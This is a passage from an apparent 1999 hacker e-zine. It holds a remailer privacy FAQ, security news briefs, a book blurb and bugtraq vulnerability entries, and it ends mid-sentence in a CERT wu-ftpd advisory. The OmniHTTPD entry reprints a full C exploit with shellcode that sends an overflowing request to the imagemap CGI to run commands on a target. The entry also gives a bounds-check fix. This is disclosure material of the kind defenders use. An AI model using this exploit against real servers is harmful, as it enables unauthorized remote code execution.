     most Internet Service Providers and corporate e-mail providers, which are terribly non
     private." Interested in them? Read Remailer FAQ. 
     
     http://www.andrebacard.com/remail.html
     
                         Anonymous Remailer FAQ

                                  by 
                         Andr Bacard, Author of 
     Computer Privacy Handbook ("The Scariest Computer Book of the Year")
                       [Updated 1 September 1999] 

                  [This article offers a nontechnical overview of "remailers" to 
                  help you decide whether to use these computer services. Links 
                  at <http://www.andrebacard.com/privacy.html> will connect you 
                  with specific remailers. I have written this especially for 
                  persons with a sense of humor. You may distribute this 
                  (unaltered) FAQ for non-commercial purposes. Copyright 1999 by 
                  Andr Bacard]. 

      What is a remailer? 

      A remailer is computer service that privatizes your e-mail. This is in 
      sharp contrast to most Internet Service Providers and corporate e-mail 
      providers, which are terribly unprivate. 

      Traditionally, a remailer allowed you to send electronic mail to a Usenet 
      news group or to a person without the recipient knowing your true name or 
      your e-mail address. Today, a new variety of web-based remailers permits 
      you to send mail using your real name       (if you wish), while 
      protecting your email records from the snooping eyes of your Internet 
      Service Provider. 

      In the first version of this FAQ (published in 1995), all popular 
      remailers were free-of-charge. Today, a number of services either charge 
      user fees, or support themselves via advertisers. 

      Why would YOU use remailers? 

      Maybe you're a computer engineer who wants to express opinions about 
      computer products, opinions that your employer might hold against you. 
      Possibly you live in a community that is violently intolerant of your 
      social, political, or religious views. Perhaps       you're seeking 
      employment via the Internet and you don't want to jeopardize your present 
      job. Possibly you want to place personal ads. Perchance you're a 
      whistle-blower afraid of retaliation. Conceivably you feel that, if you 
      criticize your government, Big Brother will monitor you. Maybe you don't 
      want people "spamming" or "flaming" your corporate e-mail address. In 
      short, there are many legitimate reasons why you, a law abiding person, 
      might use remailers. 

      How does a remailer work? 

      Let's take an imaginary example. Suppose that a battered woman, Susan, 
      wants to post a message crying out for help. How can Susan post her 
      message and receive responses confidentially? She might use a 
      "pseudo-anonymous" remailer run by Andre Bacard       called the 
      "Bacard.com" remailer. (This remailer is fictitious!) If she wrote to me, 
      my "bacard.com" computer would STRIP AWAY Susan's real name and address 
      (the header at the top of Susan's e-mail), replace this data with a dummy 
      address (for example, <an123@bacard.com> and forward Susan's message to 
      the newsgroup or person of Susan's choice. Also, my computer would 
      automatically notify Susan that her message had been forwarded under her 
      new identity <an123@bacard.com>. Suppose that Debbie responds to Susan. My 
      computer will STRIP AWAY Debbie's real name and address, give Debbie a new 
      identity, and forward the message to Susan. This process protects 
      everyone's privacy. This process is tedious for a person but easy for a 
      computer. 

      Are there many remailers? 

      The good news... Yes, there are dozens of popular remailers. 

      The bad news... Remailers tend to come and go. First, they require 
      equipment and labor to set up and maintain. Second, a minority of 
      individuals who use remailers are a pain in the neck. These selfish 
      persons drive remailer operators into early retirement. Third,       many 
      remailers owners tire of losing money. 

      I hope that we are entering an era of financially profitable remailers. 
      This profitability will permit better reliability and stability. 

      If you live and breathe computers, the best place to keep in touch with 
      the Art & Science of remailers is at the Usenet newsgroup 
      <alt.privacy.anon-server>. If you don't know the difference between a bite 
      and a bit, I recommend you simply study the remailers       found at my 
      web site.. 

      Why are some remailers free, while others charge fees? 

      In the beginning, all remailers were free to users (but not to the people 
      who ran them!). How could a remailer administrator charge people who 
      wanted maximum privacy? How could administrators ask for a credit card 
      number or take checks? Several years       ago, there was no technical 
      solution to these problems. 

      In 1995, I wrote: "In the future, remailer operators might charge for 
      their services. Privacy is valuable. For example, offshore banking is one 
      of the world's biggest businesses. It is easy to imagine Remailer, ETC., a 
      cyberspace company that goes beyond       Mailbox, ETC. (the existing 
      company which rents rents snail mail boxes). In order for remailers to 
      become commercial on a big scale, anonymous payment systems such as 
      DigiCash must become popular." 

      My predictions came true. Today, many remailer operators charge fees for 
      the same reason that you go to work in order to pay for food, housing, 
      etc. 

      Why do people operate remailers, if not for money? 

      Why does Andr Bacard spend hours writing FAQs? Why do some people 
      volunteer to help others? Some people set up remailers for their own 
      personal usage, which they may or may not care to share with the rest of 
      us. Some persons are educators or       activists. Joshua Quittner, 
      co-author of the high-tech thriller Mother's Day, interviewed Mr. Julf 
      Helsingius for Wired magazine. Helsingius, who ran the world's most 
      popular remailer for three years until he retired in August 30, 1996, 
      said: 

      "It's important to be able to express certain views without everyone 
      knowing who you are. One of the best examples was the great debate about 
      Caller ID on phones. People were really upset that the person at the 
      receiving end would know who was calling.       On things like telephones, 
      people take for granted the fact that they can be anonymous if they want 
      to and they get really upset if people take that away. I think the same 
      thing applies for e-mail. Living in Finland, I got a pretty close view of 
      how things were in the former Soviet Union. If you actually owned a 
      photocopier or even a typewriter there you would have to register it and 
      they would take samples of what your typewriter would put out so they 
      could identify it later. That's something I find so appalling. The fact 
      that you have to register every means of providing information to the 
      public sort of parallels it, like saying you have to sign everything on 
      the Net. We always have to be able to track you down". 

      What is the difference between a "pseudo-anonymous" and an "anonymous" 
      remailer? 

      Most people use the expression "anonymous remailer" as short hand for both 
      types of remailers. This causes confusion! 

      A "PSEUDO anonymous" remailer is basically an account that you open with a 
      remailer operator. The fictitious Bacard.com (described above) is a 
      PSEUDO-anonymous remailer. This means that I, the operator, and my 
      assistants KNOW your real e-mail       address. Your privacy is as good as 
      the remailer operator's power and integrity to protect your records. In 
      practice, what does this mean? Someone might get a court order to force a 
      PSEUDO anonymous remailer operator to reveal your true identity. The 
      Finnish police forced Julf Helsingius to reveal at least one person's true 
      identity. 

      The advantage of most PSEUDO-anonymous remailers is that they are 
      user-friendly. If you can send e-mail, you can probably understand PSEUDO 
      anonymous remailers. The price you pay for ease of use is less security. 

      Truly ANONYMOUS remailers are a different animal. The good news... They 
      provide much more privacy than PSEUDO anonymous remailers. The bad news... 
      They are much harder to use than their PSEUDO anonymous cousins. 

      There are basically two types of ANONYMOUS remailers. They are called 
      "Cypherpunk remailers" and Lance Cottrell's "Mixmaster remailers". Note 
      that I refer to remailers in the plural. If you want maximum privacy, you 
      should send your message through       two or more remailers. If done 
      properly, you can insure that NOBODY (no remailer operator or any snoop) 
      can read both your real name and your message. This is the real meaning of 
      ANONYMOUS. In practice, nobody can force an ANONYMOUS remailer operator to 
      reveal your identity, because the operator has NO CLUE who you are! 

      For 99% of the Internet public, the PSEUDO anonymous remailers at my web 
      site are more than adequate. 

      What are the newest trends in remailers?

      Web-based remailers are very popular. This trend was fueled, in part, by 
      Microsoft's and Yahoo!'s services. Web-based services enable you to check 
      your email via the Internet wherever you might be, for example at a public 
      library. For security purposes, a       movement is catching on to move 
      remailers "offshore", in particular to the Caribbean. The United States 
      Congress (and its enforcers -- the NSA, CIA, FBI, IRS, etc) is , by far, 
      the world's most aggressive opponent of privacy. For many reasons, privacy 
      can be increased by operating outside the United States. 

      What makes an "ideal" remailer? 

      An "ideal" remailer: (a) Is easy to use. (b) Is operated by reliable 
      persons. (c) Uses PGP or other high-level encryption, d) Allows you to 
      read your email without forwarding it to your Internet Service Provider, 
      e) Is owned and operated outside the United       States, and f) Allows 
      security experts and computer enthusiasts to examine its computer source 
      code. 

      Many top-rate remailers do NOT satisfy all these requirements. However, 
      these remailers are far superior to your ordinary Internet Service 
      Provider. So please don't make yourself crazy looking for the "perfect" 
      solution. Life is not perfect. 

      If a remailer does NOT permit PGP (Pretty Good Privacy) or other strong 
      encryption, reasonable people might assume that the remailer administrator 
      enjoys reading forwarded mail. 

      What makes a responsible remailer user? 

      A responsible user: (a) Sends text files of a reasonable length. Binary 
      photo files of Pam Anderson, or the Babe-of-the-Month, can take too much 
      transmission time. (b) Transmits files selectively. Remailers are NOT 
      designed to send "You Can Get Rich" chain       letters or other junk 
      mail. 

      Who are irresponsible remailer users? 

      Here is a quote from one remailer administrator: "This remailer has been 
      abused in the past, mostly by users hiding behind anonymity to harass 
      other users. I will take steps to squish users who do this. Lets keep the 
      net a friendly and productive place.... Using       this remailer to send 
      death threats is highly obnoxious. I will reveal your return address to 
      the police if you do this." 

      Legitimate remailer administrators will NOT TOLERATE serious harassment or 
      criminal activity. Report any such incidents to the remailer 
      administrator. 

      Having said that, I must report that I receive e-mail such as this: 
      "Someone is using a FU..ING remailer to call me a hateful person. I want 
      to get my FU..ING hands on that FU..ING (obscenities deleted) person and 
      kill him for spreading the vicious lie that I       have a bad temper. Why 
      won't the FU..ING jerk who runs the remailer help innocent victims like 
      me?" 

      As I implied earlier, it is not easy to run a remailer! 

      How safe are remailers? [for paranoids only :-)] 

      For most low-security tasks, such as responding to personal ads, PSEUDO 
      anonymous remailers with passcode protection are undoubtedly safer than 
      using real e-mail addresses. However, all the best made plans of mice and 
      men have weaknesses. Suppose,       for example, that you are a government 
      employee, who just discovered that your boss is taking bribes. Is it safe 
      to use a PSEUDO anonymous remailer to send evidence to a government 
      whistleblower's e-mail hot line? Here are a few points to ponder: 

      (a) The person who runs your e-mail system might intercept your secret 
      messages to and from the remailer. This gives him proof that YOU are 
      reporting your corrupt boss. This evidence could put you in danger. 

      (b) Maybe the remailer is a government sting operation or a criminal 
      enterprise designed to entrap people. The person who runs this service 
      might be your corrupt boss' partner. 

      Warning: I have seen a few remailers that strike me as suspicious. For 
      legal reasons, I cannot name these services. You must decide for yourself 
      who to trust. 

      (c) Hackers can do magic with computers. It's possible that civilian or 
      Big Brother hackers have broken into the remailer (unbeknownst to the 
      remailer's administrator), and that they can read your messages at will. 

      (d) It is possible that Big Brother collects, scans, and stores all 
      messages, including passcodes, into and out of the remailer. 

      (e) If you use a United States based remailer, a U.S. judge could subpoena 
      the remailer's records. 

      For these reasons, hard-core privacy people are leery of PSEUDO anonymous 
      remailers. These people use Cypherpunk or Mixmaster programs that route 
      their messages through several ANONYMOUS remailers. In addition, they use 
      PGP encryption
      software for all messages.       

      (For a good anonymous remailer try out www.replay.com ... - Ed)
     
     @HWA
     
55.0  PROJECT GAMMA STILL DOWN
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ, Saturday 23rd October 1999 on 2:12 am CET
      Project Gamma is still down, but WHiTe VaMPiRe tells all of its visitors: "The DNS
      will be down for another week. Probably the soonest pG will be back up now is on the
      25th. ;\ We are doing everything that is humanly possible to bring it back, as quickly
      as possible" 
      
      @HWA
      
56.0  PRIVATE DESKTOP
      ~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ, Saturday 23rd October 1999 on 2:24 am CET
      ConSeal Private Desktop is a personal firewall that puts you in full control of your
      PC's connection to the Internet! Designed for the non-technical user, this privacy
      management tool stops all known attacks including Back Orifice, denial of service
      and cyber stalkers       
      
      http://www.signal9.com/products/desktop/index.html
      
      @HWA
      
57.0  Y2K RELATED DISASTER
      ~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ, Saturday 23rd October 1999 on 1:04 am CET
      Chicago Tribune wrote about an ecological dissaster with roots in Y2K solving - Trying
      a dose of preventive medicine, Alexian Brothers Medical Center in Elk Grove Village
      prepared for a possible Y2K power outage by pumping up the diesel fuel tanks that
      power the hospital's electrical generators. But the hospital's good intentions backfired
      earlier this month when the tanks received more fuel than they could hold. The
      overflow--2,000 gallons--seeped through an underground drain tile, through a series of
      storm sewers and, finally, into a retention pond surrounded by luxury homes 
      
      @HWA
      
58.0  ANTI-MS SOFTWARE
      ~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ, Saturday 23rd October 1999 on 1:04 am CET
      Revenge of Mozilla is the first utility to completely remove Internet Explorer from
      Windows 98. The first version of Revenge of Mozilla was a companion for 98Lite,
      finishing the job that 98Lite left behind. It was created due to a strong demand for an
      application that would 1) Remove IE in it's entirety, 2) Do it *all* in one shot, 3) Not
      require fussing with a DOS-based application prior to installing Windows98, and 4) Be
      completely free of charge for the web community to enjoy. 
      
      http://www.silverlink.net/~jensenba/rom2/
      
      @HWA
      
59.0  HOTMAIL: ANOTHER VULNERABILITY, THE SOAP CONTINUES
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by Thejian, Friday 22nd October 1999 on 8:20 pm CET
      Within the last couple weeks, Microsoft has unveiled their new Passport service
      which allows you to log in to multiple sites and do your work with one single login.
      However, they failed to realize that not all people allow all cookies everywhere to be
      put on their computer. It is possible by making a settings change in Netscape (and
      possibly IE) to transparently let a user log in as the last user that used Hotmail on
      that computer. Microsoft is investigating the problem but noted that it's a problem
      within the Passport sign-out service and added that the Passport wallet service is not
      vulnerable. 
      
60.0  Books: Hacking Exposed: Network Security Secrets and Solutions 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.securityfocus.com/

      Hacking Exposed: Network Security Secrets and Solutions 
      by George Kurtz , Stuart McClure and Joel Scambray 
      <Osborne /McGraw-Hill>
      Type: book   ISBN: 0072121270   Year: 1999                                                                                                                                    
                                                                                                                                                                                Buy it! 
      
      
        Defend your network against the sneakiest hacks and latest attacks. In 
        this must-have handbook, security experts Stuart McClure, Joel Scambray, 
        and George Kurtz give you the full scoop on some of the most highly 
        publicized and insidious break-ins and show you how to implement 
        bulletproof security on your system. All aspects of network security are 
        included from informational scans and probes to password 
        vulnerabilities, dialup networking insecurities, buffer overflows, Web 
        and email insecurities, trojans, and back doors. Hacking Exposed: 
        Network Security Secrets and Solutions covers all security, auditing, 
        and intrusion detection procedures for UNIX (including Linux), Windows 
        NT/95/98, and Novell networks. 

        The bonus companion web site (www.hackingexposed.com) contains custom 
        scanning scripts and links to security tools.

        Foreword by industry expert Marcus Ranum, CEO of Network Flight Recorder 
        (NFR).

        Here's what security experts are saying about "Hacking Exposed". 

        "Understanding how to mount and create attacks is the only way you can 
        protect against existing and, more importantly, future attacks. The 
        information contained herein arms those on the defensive (security 
        admin,         network architects, software developers, etc) with this 
        knowledge. It is refreshing to see this sort of material finally being 
        made available to the general public." - Dr. Mudge of Lopht security 
        research group, developers of the Lophtcrack NT password auditing tool 

        "My experience in securing systems is that most users are shocked when 
        they find out how vulnerable they really are. Perhaps this book will 
        shock you. No matter what, it will educate you."         - Marcus Ranum, 
        CEO of Network Flight Recorder 

        "The authors have put together an excellent up-to-date resource on 
        modern security vulnerabilities. Rather than simply documenting a few 
        case studies and talking about problems on a macro scale, the authors 
        build up         a robust framework and dissect the security issues 
        completely. Each vulnerability covered has detailed countermeasure 
        information. More than a how-to manual, it's a how-to-do-it-right 
        manual. A book like this has been needed for quite some time now." - 
        Mike D. Schiffman ("Route"), Security Researcher and Author of the 
        Firewalk tool 

        "Hacking Exposed is a gut wrenching look at the security techniques used 
        in computer penetration. The authors provide an up to date and 
        comprehensive view of the methods that hackers use to compromise your         
        networks. If this book doesn't scare and motivate you to take security 
        seriously, nothing will." - Aleph One, Moderator of the Bugtraq Security 
        Mailing List 

        "This book is destined to be a classic. Unlike most other security 
        books, this explains details on hacker tools - why they are used, how 
        they work, and how best to protect yourself from them. The underground 
        already         knows this stuff, and this book helps the sys admin see 
        their systems through the intruder's eyes." - Simple Nomad, Renowned 
        Security Researcher and Author of The Hack FAQ 

        Learn to:

        Find, exploit, and apply countermeasures for security holes in Unix, 
        Linux, Windows NT/95/98, and Novell networks Repair email and Web 
        security holes (CGI, Perl, ASP, browsers, and hostile mobile code) 
        Understand         how back channels and port redirection are used to 
        circumvent firewalls Locate and scan for vulnerable systems using Whois, 
        Domain Name System queries, Ping Sweeps, Port Scans, and OS detection 
        Enumerate users, groups, shares, file systems, and services with no 
        authentication. Crack accounts and passwords, escalate privilege, and 
        exploit trusts Find and eliminate back doors, Trojan horses, viruses, 
        and buffer overflows Implement auditing and intrusion detection 
        solutions Recognize vulnerabilities from dialup modems, modem pools, and 
        RAS servers.
        
        @HWA
        

61.0  Microsoft Java Virtual Machine Class Cast Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.securityfocus.com/
      
      bugtraq id   740
      class        Failure to Handle Exceptional Conditions
      cve          GENERIC-MAP-NOMATCH
      remote       Yes
      local        Yes
      published    October 22, 1999
      updated      October 22, 1999
      
      vulnerable
              Microsoft Virtual Machine 3000.0 Series
                 + Microsoft Internet Explorer 5.0 for Windows NT 4.0
                    + Microsoft Windows NT 4.0
                 + Microsoft Internet Explorer 5.0 for Windows 98
                    + Microsoft Windows 98
                 + Microsoft Internet Explorer 5.0 for Windows 95
                    + Microsoft Windows 95
                 + Microsoft Internet Explorer 5.0 for Windows 2000
                    - Microsoft Windows NT 2000.0
              Microsoft Virtual Machine 2000.0 Series
                 + Microsoft Internet Explorer 4.0 for Windows NT 4.0
                    + Microsoft Windows NT 4.0
                 + Microsoft Internet Explorer 4.0 for Windows NT
              3.51
                    - Microsoft Windows NT 3.5.1
                 + Microsoft Internet Explorer 4.0 for Windows 98
                    + Microsoft Windows 98
                 + Microsoft Internet Explorer 4.0 for Windows 95
                    + Microsoft Windows 95
       not vulnerable
              Microsoft Virtual Machine 3188.0.0 and up
                 - Microsoft Internet Explorer 5.0 for Windows NT 4.0
                    + Microsoft Windows NT 4.0
                 - Microsoft Internet Explorer 5.0 for Windows 98
                    + Microsoft Windows 98
                 - Microsoft Internet Explorer 5.0 for Windows 95
                    + Microsoft Windows 95
                 - Microsoft Internet Explorer 5.0 for Windows 2000
                    - Microsoft Windows NT 2000.0
                 - Microsoft Internet Explorer 4.0 for Windows NT 4.0
                    + Microsoft Windows NT 4.0
                 - Microsoft Internet Explorer 4.0 for Windows NT
              3.51
                    - Microsoft Windows NT 3.5.1
                 - Microsoft Internet Explorer 4.0 for Windows 98
                    + Microsoft Windows 98
                 - Microsoft Internet Explorer 4.0 for Windows 95
                    + Microsoft Windows 95        
                    
       The Virtual Machine is a component of various programs and operating
      systems that handles the execution of Java code. All Microsoft VMs with
      build numbers between 2000 and 3187 inclusive have been found to
      contain a weakness whereby a Java applet could take any action on the
      local machine that the user could take. This is possible because the MS
      VM allows 'cast', or conversion, operations to be done on classes, which
      creates the opportunity for a 'public' class to be converted to 'private',
      thereby increasing the privileges of the code within that class. This
      action could not be coded in a regular java compiler, but the java binary
      could be edited spoecifically to cause the cast operation             
      
      Microsoft has released a new build that is not subject to this
      vulnerability, available at:
      http://www.microsoft.com/java/vm/dl_vm32.htm
      
      credit
      Publicized in Microsoft Security Bulletin MS99-045,
      released on Oct 21, 1999.

      reference
      advisory:
               MS99-045: Patch Available "Virtual Machine
               Verifier" Vulnerability
               (MS)
      web page:
               Microsoft Security Bulletin (MS99-045):
               Frequently Asked Questions
               (Microsoft)
      web page:
               Microsoft Virtual Machine
               (Microsoft)

      
      @HWA
      
      
62.0  OmniHTTPD Buffer Overflow Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id 739
      class      Boundary Condition Error
      cve        GENERIC-MAP-NOMATCH
      remote     Yes
      local      No
      published  October 22, 1999
      updated    October 22, 1999
      
      vulnerable
      
              Omnicron OmniHTTPD 2.4Pro
              Omnicron OmniHTTPD 1.1      
              
      There is a remotely exploitable buffer overflow vulnerability in the CGI
      program "imagemap", which is distributed with Omnicron's OmniHTTPD.
      During operations made on arguments passed to the program, a lack of
      bounds checking on a strcpy() call can allow for arbitrary code to be
      executed on the machine running the server.        
      
      /*=============================================================================
         Imagemap 1.00.00 CGI Exploit (Distributed with OmniHTTPd 1.01 and Pro2.04)
         The Shadow Penguin Security (http://shadowpenguin.backsection.net)
         Written by UNYUN (shadowpenguin@backsection.net)
        =============================================================================
      */
      #include    <stdio.h>
      #include    <string.h>
      #include    <windows.h> 
      #include    <winsock.h>
      
      #define     MAXBUF          2000
      #define     RETADR          348
      #define     JMPADR          344
      #define     HTTP_PORT       80
      
      unsigned int mems[]={
      0xBFB50000, 0xBFB72FFF,  0xBFDE0000, 0xBFDE5FFF,
      0xBFE00000, 0xBFE0FFFF,  0xBFE30000, 0xBFE42FFF,
      0xBFE80000, 0xBFE85FFF,  0xBFE90000, 0xBFE95FFF,
      0xBFEA0000, 0xBFF1EFFF,  0xBFF20000, 0xBFF46FFF,
      0xBFF50000, 0xBFF60FFF,  0xBFF70000, 0xBFFC5FFF,
      0xBFFC9000, 0xBFFE2FFF,
      0,0};
      
      unsigned char exploit_code[200]={
      0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
      0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
      0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
      0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
      0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
      0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
      0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
      0xFF,0x00
      };
      
      unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";
      
      unsigned int search_mem(unsigned char *st,unsigned char *ed,
                      unsigned char c1,unsigned char c2)
      {
          unsigned char   *p;
          unsigned int    adr;
      
          for (p=st;p<ed;p++)
              if (*p==c1 && *(p+1)==c2){
                  adr=(unsigned int)p;
                  if ((adr&0xff)==0) continue;
                  if (((adr>>8)&0xff)==0) continue;
                  if (((adr>>16)&0xff)==0) continue;
                  if (((adr>>24)&0xff)==0) continue;
                  return(adr);
              }
          return(0);
      }
      
      main(int argc,char *argv[])
      {
          SOCKET               sock;
          SOCKADDR_IN          addr;
          WSADATA              wsa;
          WORD                 wVersionRequested;
          unsigned int         i,ip,p1,p2;
          static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000];
          struct hostent       *hs;
      
          if (argc<2){
              printf("usage: %s VictimHost\n",argv[0]); return -1;
          }
          wVersionRequested = MAKEWORD( 2, 0 );
          if (WSAStartup(wVersionRequested , &wsa)!=0){
              printf("Winsock Initialization failed.\n"); return -1;
          }
          if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
              printf("Can not create socket.\n"); return -1;
          }
          addr.sin_family     = AF_INET;
          addr.sin_port       = htons((u_short)HTTP_PORT);
          if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
                  if ((hs=gethostbyname(argv[1]))==NULL){
                      printf("Can not resolve specified host.\n"); return -1;
                  }
                  addr.sin_family = hs->h_addrtype;
                  memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
          }
          if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
              printf("Can not connect to specified host.\n"); return -1;
          }
          memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
          for (i=0;;i+=2){
              if (mems[i]==0) return FALSE;
              if ((ip=search_mem((unsigned char *)mems[i],
                  (unsigned char *)mems[i+1],0xff,0xe3))!=0) break;
          }
          buf[RETADR  ]=ip&0xff;
          buf[RETADR+1]=(ip>>8)&0xff;
          buf[RETADR+2]=(ip>>16)&0xff;
          buf[RETADR+3]=(ip>>24)&0xff;
          buf[JMPADR  ]=0xeb;
          buf[JMPADR+1]=0x06;
      
          strcat(exploit_code,cmdbuf);
          p1=(unsigned int)LoadLibrary;
          p2=(unsigned int)GetProcAddress;
          exploit_code[0x0d]=p1&0xff;
          exploit_code[0x0e]=(p1>>8)&0xff;
          exploit_code[0x0f]=(p1>>16)&0xff;
          exploit_code[0x10]=(p1>>24)&0xff;
          exploit_code[0x1e]=p2&0xff;
          exploit_code[0x1f]=(p2>>8)&0xff;
          exploit_code[0x20]=(p2>>16)&0xff;
          exploit_code[0x21]=(p2>>24)&0xff;
      
          memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
          sprintf(packetbuf,"GET /cgi-bin/imagemap.exe?%s\r\n\r\n",buf);
          send(sock,packetbuf,strlen(packetbuf),0);
          closesocket(sock);
          printf("Done.\n");
          return FALSE;
      }
      
       Since source code for the imagemap program is supplied, UNYUN of
       Shadow Penguin Security suggests that checking for oversized
       arguments be added to the code:
      
      
       void main(int argc, char **argv)
       {
       ----------- omit ----------
       char OutString[100];
       ----------- omit ----------
       if(argc >= 2) {
       //
       // extract x & y from passed values
       //
       strcpy(OutString, argv[1]);
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Buffer overflow caused by this strcpy().
       This overflow can be avoided if you put the following code before
       strcpy().
      
       if (strlen(argv[1])>99) exit
      
       There are no known vendor provided solutions to this problem.
       
       credit
      Posted to BugTraq by UNYUN
      <shadowpenguin@backsection.net> on Oct 22,
      1999.

      reference
      web page:
               Omnicron Homepage
               (Omnicron Technologies Corporation)
               http://www.omnicron.ab.ca
               
      message:
               Imagemap CGI overflow exploit
               (UNYUN <shadowpenguin@backsection.net>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=380FFD9429E.0DA9SHADOWPENGUIN@fox.nightland.net
               
      



      @HWA
      

63.0  Linux cwdtools Vulnerabilities
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id 738
      class      Unknown
      cve        GENERIC-MAP-NOMATCH
      remote     No
      local      Yes
      published  October 22, 1999
      updated    October 22, 1999
      
      vulnerable
      
              S.u.S.E. Linux 6.2
              S.u.S.E. Linux 6.1
              
       cdwtools is a package of utilities for cd-writing. The linux version of
      these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to
      several local root compromises. It is known that there are a number of
      ways to exploit these packages, including buffer overflows and /tmp
      symlink attacks.        
      
      S.u.S.E offers patched packages at the location below:

      ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/cdwtools-0.93-101.i386.rpm
      ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/cdwtools-0.93-100.i386.rpm
      ftp://ftp.suse.com/pub/suse/axp/update/6.1/ap1/cdwtools-0.93-101.alpha.rpm

      credit
       This bug was apparently discovered by Brock Tellier and
       published in a S.u.S.E advisory on Oct 20, 1999.

      reference
       advisory:
               SuSE-025: All Linux distributions using cdwtools
               (SuSE)
               http://www.securityfocus.com/templates/advisory.html?id=1803
      web page:
               S.u.S.E. Patches/Fixes
               (S.u.S.E.)
               http://http://www.suse.de/de/support/download/updates/index.html
               
      @HWA         
      
64.0  WU-Ftpd NEW DoS vulnerabilty
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  737
      class       Failure to Handle Exceptional Conditions
      cve         GENERIC-MAP-NOMATCH
      remote      Yes
      local       No
      published   October 21, 1999
      updated     October 21, 1999
      
      vulnerable
      
              Washington University wu-ftpd 2.5
                 + RedHat Linux 6.1
                 
      not vulnerable
              Washington University wu-ftpd 2.6.0
      
       It may be possible for remote users to cause wu-ftpd to consume large
      amounts of memory, creating a denial of service. If users can upload
      files, arbitrary code can be executed with the uid of the ftpd (usually
      root)
      
      You can upgrade to the newest version of Wu-ftpd (2.6) for any
      vulnerable platform.
     
      RedHat has released patches available at the following locations:
     
      Red Hat Linux 4.2
      - -----------------
     
      Intel:
      ftp://updates.redhat.com//4.2/i386/wu-ftpd-2.6.0-0.4.2.i386.rpm
      Alpha:
      ftp://updates.redhat.com//4.2/alpha/wu-ftpd-2.6.0-0.4.2.alpha.rpm
      Sparc:
      ftp://updates.redhat.com//4.2/sparc/wu-ftpd-2.6.0-0.4.2.sparc.rpm
      Source packages:
      ftp://updates.redhat.com//4.2/SRPMS/wu-ftpd-2.6.0-0.4.2.src.rpm
     
      Red Hat Linux 5.2
      - -----------------
     
      Intel:
      ftp://updates.redhat.com//5.2/i386/wu-ftpd-2.6.0-0.5.x.i386.rpm
      Alpha:
      ftp://updates.redhat.com//5.2/alpha/wu-ftpd-2.6.0-0.5.x.alpha.rpm
      Sparc:
      ftp://updates.redhat.com//5.2/sparc/wu-ftpd-2.6.0-0.5.x.sparc.rpm
      Source packages:
      ftp://updates.redhat.com//5.2/SRPMS/wu-ftpd-2.6.0-0.5.x.src.rpm
     
      Red Hat Linux 6.x
      - -----------------
     
      Intel:
      ftp://updates.redhat.com//6.0/i386/wu-ftpd-2.6.0-1.i386.rpm
      Alpha:
      ftp://updates.redhat.com//6.0/alpha/wu-ftpd-2.6.0-1.alpha.rpm
      Sparc:
      ftp://updates.redhat.com//6.0/sparc/wu-ftpd-2.6.0-1.sparc.rpm
      Source packages:
      ftp://updates.redhat.com//6.0/SRPMS/wu-ftpd-2.6.0-1.src.rpm
      
      credit
      Released in CERT advisory CA-99-13, posted to BugTraq
      on Oct 19, 1999 and originally AUSCERT advisory
      AA-99.02, published on Oct 19, 1999.

      reference
       advisory:
               CA-99-13: Multiple Vulnerabilities in WU-FTPD
               (CERT)
               http://www.securityfocus.com/templates/advisory.html?id=1797
               
      advisory:
               AA-99.02: Multiple Vulnerabilities in wu-ftpd
               based daemons
               (AusCERT)
               http://www.securityfocus.com/templates/advisory.html?id=1799
               
      advisory:
               RHSA-1999:043-01: Security problems in
               WU-FTPD
               (RedHat)
               http://www.securityfocus.com/templates/advisory.html?id=1801
               
      web page:
               Updates, Fixes, and Errata Page
               (RedHat)
               http://www.redhat.com/corp/support/errata/index.html
               


      CA-99-13: Multiple Vulnerabilities in WU-FTPD
      Published: Tue Oct 19 1999
      Updated: Tue Oct 19 1999 
      
      
      
      CERT Advisory CA-99-13 Multiple Vulnerabilities in WU-FTPD
      
         Original release date: October 19, 1999
         Last revised: --
         Source: CERT/CC
         
         A complete revision history is at the end of this file.
         
      Systems Affected
      
           * Systems running the WU-FTPD daemon or its derivatives
             
      I. Description
      
         Three vulnerabilities have been identified in WU-FTPD and other ftp
         daemons based on the WU-FTPD source code. WU-FTPD is a common package
         used to provide File Transfer Protocol (FTP) services. Incidents
         involving at least the first of these vulnerabilities have been
         reported to the CERT Coordination Center.
         
      Vulnerability #1: MAPPING_CHDIR Buffer Overflow
      
         Because of improper bounds checking, it is possible for an intruder to
